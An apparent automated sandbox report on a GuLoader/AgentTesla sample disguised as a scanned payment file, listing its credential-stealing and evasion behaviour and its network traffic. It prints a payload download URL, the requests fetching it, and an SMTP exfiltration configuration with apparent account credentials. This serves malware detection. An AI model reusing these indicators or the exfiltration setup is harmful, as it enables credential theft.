Windows Analysis Report Scanned Payment Copy00024.scr.exe

Overview

General Information

Sample Name: Scanned Payment Copy00024.scr.exe
Analysis ID: 530423
MD5: 9ebaab853c410a3c6ef16ecf45739e8b
SHA1: 67c221c5f1329829d7a808791dc030bf1288d2d7
SHA256: b24869692ba4efa8bb957cb2334ac798b570277c038db867db5a177a0e9a54ec
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?expo"}
Source: conhost.exe.368.7.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trjramos.camacoil@gmail.com"}
Multi AV Scanner detection for submitted file
Source: Scanned Payment Copy00024.scr.exe ReversingLabs: Detection: 33%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E5CC8 CryptUnprotectData, 6_2_012E5CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E6308 CryptUnprotectData, 6_2_012E6308

Compliance:

barindex
Uses 32bit PE files
Source: Scanned Payment Copy00024.scr.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49808 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?expo
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 116.202.203.61 116.202.203.61
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-9o-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49817 -> 116.202.203.61:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49817 -> 116.202.203.61:587
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp String found in binary or memory: http://OXDyLI.com
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp String found in binary or memory: http://furteksdokuma.com.tr
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp String found in binary or memory: http://mail.furteksdokuma.com.tr
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: CasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45584258822.000000001CDE1000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394924557.000000001E065000.00000004.00000001.sdmp String found in binary or memory: http://yjmpHNwxHQcW4vG64IN.com
Source: CasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmp String found in binary or memory: http://yjmpHNwxHQcW4vG64IN.comt-
Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000006.00000003.44649168355.0000000001174000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/
Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp String found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/C=
Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072
Source: CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/mond1
Source: CasPol.exe, 00000006.00000003.45582109060.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383368510.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/s
Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383368510.00000000010E9000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz
Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXzL9yXV0dnDBBTu9pZE
Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-9o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49808 version: TLS 1.2

System Summary:

barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Scanned Payment Copy00024.scr.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Scanned Payment Copy00024.scr.exe Static file information: Suspicious name
Uses 32bit PE files
Source: Scanned Payment Copy00024.scr.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Code function: 1_2_004047F9 1_2_004047F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E41130 6_2_00E41130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E43A50 6_2_00E43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E4BA58 6_2_00E4BA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E44320 6_2_00E44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E4C7B8 6_2_00E4C7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E43708 6_2_00E43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E56D90 6_2_00E56D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00E507E0 6_2_00E507E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DF0 6_2_00F17DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DFC 6_2_00F17DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DE4 6_2_00F17DE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DD8 6_2_00F17DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DC0 6_2_00F17DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DCC 6_2_00F17DCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DB4 6_2_00F17DB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17DA8 6_2_00F17DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17D90 6_2_00F17D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17D9C 6_2_00F17D9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17D84 6_2_00F17D84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17D78 6_2_00F17D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EF8 6_2_00F17EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EE0 6_2_00F17EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EEC 6_2_00F17EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17ED4 6_2_00F17ED4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EC8 6_2_00F17EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EB0 6_2_00F17EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EBC 6_2_00F17EBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17EA4 6_2_00F17EA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E98 6_2_00F17E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E80 6_2_00F17E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E8C 6_2_00F17E8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E74 6_2_00F17E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E68 6_2_00F17E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E50 6_2_00F17E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E5C 6_2_00F17E5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E44 6_2_00F17E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E38 6_2_00F17E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E20 6_2_00F17E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E2C 6_2_00F17E2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E14 6_2_00F17E14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17E08 6_2_00F17E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17FC4 6_2_00F17FC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17FB8 6_2_00F17FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17FA0 6_2_00F17FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17FAC 6_2_00F17FAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F94 6_2_00F17F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F88 6_2_00F17F88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F70 6_2_00F17F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F7C 6_2_00F17F7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F64 6_2_00F17F64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F58 6_2_00F17F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F40 6_2_00F17F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F4C 6_2_00F17F4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F34 6_2_00F17F34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F28 6_2_00F17F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F10 6_2_00F17F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F1C 6_2_00F17F1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_00F17F04 6_2_00F17F04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012AA4E8 6_2_012AA4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012AB8D0 6_2_012AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012ABB0A 6_2_012ABB0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012A5E70 6_2_012A5E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012A8130 6_2_012A8130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012A3330 6_2_012A3330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E9558 6_2_012E9558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E2DA8 6_2_012E2DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012EC8E8 6_2_012EC8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E7BD8 6_2_012E7BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E1BD0 6_2_012E1BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012EEE96 6_2_012EEE96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E8DA8 6_2_012E8DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012EA5A0 6_2_012EA5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E7330 6_2_012E7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_012E6F90 6_2_012E6F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF64C48 6_2_1CF64C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF61C08 6_2_1CF61C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF617C0 6_2_1CF617C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF6A1E8 6_2_1CF6A1E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1CF663D0 6_2_1CF663D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1DD75E08 6_2_1DD75E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1DD746C4 6_2_1DD746C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1DD75D20 6_2_1DD75D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1DD76AF1 6_2_1DD76AF1
Sample file is different than original file name gathered from version info
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44676680374.0000000000424000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44678368092.0000000002360000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDybblsbro.exeFE2XCorps vs Scanned Payment Copy00024.scr.exe
Source: Scanned Payment Copy00024.scr.exe Binary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe
PE file contains strange resources
Source: Scanned Payment Copy00024.scr.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: Scanned Payment Copy00024.scr.exe ReversingLabs: Detection: 33%
Source: Scanned Payment Copy00024.scr.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe File created: C:\Users\user\AppData\Local\Temp\~DFEFF002A05981B24C.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
